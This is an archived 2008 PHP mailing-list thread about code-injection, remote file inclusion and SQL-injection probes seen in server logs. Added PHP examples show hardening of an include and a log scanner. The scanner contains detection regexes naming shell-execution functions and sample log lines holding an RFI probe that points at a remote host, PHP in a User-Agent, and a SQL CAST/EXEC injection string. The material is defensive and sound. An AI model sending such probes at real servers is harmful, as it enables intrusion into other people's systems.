The code was encoded, and after decoding it, all it does is echo a statement
back. 
 
Some searching online, I found a write-up on it -
http://hphosts.blogspot.com/2008/09/alas-another-exploit-attempt-rfiphp.html
- if you're interested.
 
As to why use the HTTP_USER_AGENT field... Got me. I don't know of any
exploits using it...
 
A quick search online, I did find an older version of AWStats that had a bug
using the HTTP_REFERER. Could be related. See
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=290
 
Btw, you would be surprised at how many hosting places there are where you
can use commands like 'exec', 'shell_exec', 'system', 'passthru'.
 
A URL Injection example: http://osvdb.org/show/osvdb/37816
The code this injection exploits is:

    require_once($languagePath . 'common.lang.php');
 
If you're really curious and want more info, try some searches for "PHP remote
file inclusion" or "url injection".
 
Terre
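The include quoted above is the classic remote file inclusion shape: whatever ends up in $languagePath is concatenated straight into a require_once, so a request-controlled value (via register_globals or a raw $_GET read) can point it at a remote URL when allow_url_include is on, or at an arbitrary local file otherwise. As an added example, not code from the thread or from the affected project, here is the same include written so the request value never becomes a path. It assumes a lang/<code>/common.lang.php layout, an allow-list of "en", "de" and "fr", and a query parameter named "lang"; all three are assumptions.

```php
<?php
// Added example (not from the thread): hardening a language include against
// remote/local file inclusion. The vulnerable shape quoted in the thread is
//   require_once($languagePath . 'common.lang.php');
// where $languagePath can be controlled by the request.

declare(strict_types=1);

// Assumed layout: lang/<code>/common.lang.php under this script's directory.
const LANG_DIR = __DIR__ . '/lang';
// Assumed: the only language codes that ship with the application.
const ALLOWED_LANGS = ['en', 'de', 'fr'];

/**
 * Resolve a user-supplied language code to an include path, or return null.
 * The request value is only compared against a fixed allow-list; it is never
 * used to build the path, and the final path is checked to stay inside LANG_DIR.
 */
function resolveLanguageFile(string $requested): ?string
{
    // Normalise, then allow-list: anything not exactly "en"/"de"/"fr" is rejected,
    // so "http://...", "../", null bytes or absolute paths never reach the filesystem.
    $code = strtolower(trim($requested));
    if (!in_array($code, ALLOWED_LANGS, true)) {
        return null;
    }

    $candidate = LANG_DIR . '/' . $code . '/common.lang.php';

    // Defence in depth: realpath() resolves symlinks and "..", and we insist the
    // result still lives under LANG_DIR and is a regular file before including it.
    $real = realpath($candidate);
    $base = realpath(LANG_DIR);
    if ($real === false || $base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0 || !is_file($real)) {
        return null;
    }
    return $real;
}

// Usage: $_GET['lang'] is untrusted; fall back to English when it is not on the list.
$file = resolveLanguageFile($_GET['lang'] ?? 'en') ?? resolveLanguageFile('en');
if ($file === null) {
    http_response_code(500);
    exit('language files missing');
}
require_once $file;
```

The allow-list is what actually closes the hole; the realpath check only guards against a misconfigured LANG_DIR or a stray symlink. On the hosting side, the php.ini directives that go with this are allow_url_include = Off (and allow_url_fopen = Off where nothing needs it) and a disable_functions list covering exec, shell_exec, system and passthru, which addresses the point above about how often those are left enabled.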

  _____  

From: Matthew Ratzloff [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, September 16, 2008 7:21 PM
To: Terre Porter
Cc: fw-general@lists.zend.com
Subject: Re: [fw-general] programmers fyi


OK, I can see how this would be a problem if you logged user agents in the
database, someone sent an SQL injection attempt, and you didn't use prepared
statements or escape those values.  But... uh... how is PHP "injection"
supposed to do anything?  Is someone eval-ing the user agent or what?  Maybe
I'm missing something. 

-Matt


On Tue, Sep 16, 2008 at 2:39 PM, Terre Porter <[EMAIL PROTECTED]>
wrote:


Hey all,

Just thought I'd pass on this observation; it's not related directly to the
framework, but this happens to be the only list I'm on anymore.

Anyways, I've been monitoring a large influx of code injection attempts by
inserting php code in the server variables, HTTP_USER_AGENT mostly. These
sometimes are included with a URL Injection attempt but not always.

Also for those out there who have some CF or ASP (I think) there are a lot
of the following being appended to page requests. Trimmed but should make
the point...

    [EMAIL PROTECTED](4000);[EMAIL PROTECTED](0x4445...%20AS%20CHAR(4000));EXEC(@S);

Just as a reminder to everyone to write more secure code.

Here are some numbers from a smaller site I'm logging, avg 2500 visitors a
day.

Date           Attempts

01/Sep/2008       86
02/Sep/2008      119
03/Sep/2008       56
04/Sep/2008       31
05/Sep/2008       93
06/Sep/2008       84
07/Sep/2008      129
08/Sep/2008      141
09/Sep/2008       47
10/Sep/2008      136
11/Sep/2008       96
12/Sep/2008      140
13/Sep/2008      200
14/Sep/2008      250
15/Sep/2008      130
16/Sep/2008       36

URL Injection attempts from 1773 unique ip addresses. (that's a few infected
machines)

These numbers don't count all the HTTP_USER_AGENT code injection attempts as
those are getting blocked by .htaccess currently.

Just wanted to let people know the script-kiddy scanners are out playing.

Terre
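The post above is counting these probes by hand from server logs. As an added example (not code from the thread), here is a small PHP scanner that does the same classification over Apache combined-format access log lines: PHP code carried in the User-Agent header, the CAST(... AS CHAR(4000)) ... EXEC(...) SQL string appended to requests, and a query parameter whose value is an absolute URL (the RFI probe). The log format, the indicator regexes and the sample lines are all constructed for the example; in particular the SQL sample fills in the tokens the archive obfuscated with a plausible DECLARE/SET pair, which is an assumption.

```php
<?php
// Added example (not from the thread): scanning Apache combined-format access
// log lines for the probe types described in the post and summarising them
// per indicator with distinct source IP counts, as the post does by hand.

declare(strict_types=1);

// Combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
const LOG_PATTERN = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';

/** Parse one combined-format line into an associative array, or null if malformed. */
function parseLogLine(string $line): ?array
{
    if (!preg_match(LOG_PATTERN, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'request' => $m[3],
            'status' => (int) $m[4], 'referer' => $m[5], 'ua' => $m[6]];
}

/** Return the list of indicator names that match a parsed line. */
function classify(array $entry): array
{
    $hits = [];
    // PHP open tag, or one of the execution functions named in the thread, in the User-Agent.
    if (preg_match('/<\?php|\b(eval|system|passthru|shell_exec|exec)\s*\(/i', $entry['ua'])) {
        $hits[] = 'php-in-user-agent';
    }
    // The request line is URL-encoded in the log; decode before matching.
    $req = rawurldecode($entry['request']);
    // CAST(... AS CHAR(n)) followed by EXEC(...): the shape visible in the post.
    if (preg_match('/CAST\s*\(.*AS\s+N?CHAR\s*\(\d+\)\s*\).*EXEC\s*\(/is', $req)) {
        $hits[] = 'sql-cast-exec';
    }
    // A query parameter whose value is an absolute http(s)/ftp URL: classic RFI probe.
    if (preg_match('/[?&][\w\[\]]+=(https?|ftp):\/\//i', $req)) {
        $hits[] = 'url-in-query-param';
    }
    return $hits;
}

/** Summarise a log: per-indicator hit counts and the number of distinct source IPs. */
function summarise(array $lines): array
{
    $counts = [];
    $ips = [];
    foreach ($lines as $line) {
        $entry = parseLogLine($line);
        if ($entry === null) {
            continue;   // skip lines that do not parse rather than aborting the run
        }
        foreach (classify($entry) as $hit) {
            $counts[$hit] = ($counts[$hit] ?? 0) + 1;
            $ips[$hit][$entry['ip']] = true;
        }
    }
    ksort($counts);
    return ['counts' => $counts, 'unique_ips' => array_map('count', $ips)];
}

// Constructed sample lines (documentation-range addresses; payload shapes only).
$sample = [
    '192.0.2.10 - - [14/Sep/2008:10:00:01 +0000] "GET /index.php?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [14/Sep/2008:10:00:02 +0000] "GET /index.php?lang=http://203.0.113.5/x.txt? HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [14/Sep/2008:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo \'probe\'; ?>"',
    // Assumed reconstruction of the obfuscated tokens as "DECLARE @S" / "SET @S=".
    '192.0.2.13 - - [14/Sep/2008:10:00:04 +0000] "GET /page.asp?id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
    'garbage line that does not parse',
];

print_r(summarise($sample));
```

Run it as `php scan.php` (or feed it `file('access.log', FILE_IGNORE_NEW_LINES)` in place of $sample); the summary gives the same two figures the post reports, hits per indicator and distinct source addresses per indicator. The regexes are deliberately narrow so the numbers stay comparable day to day; widen them in one place if a new probe shape turns up.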



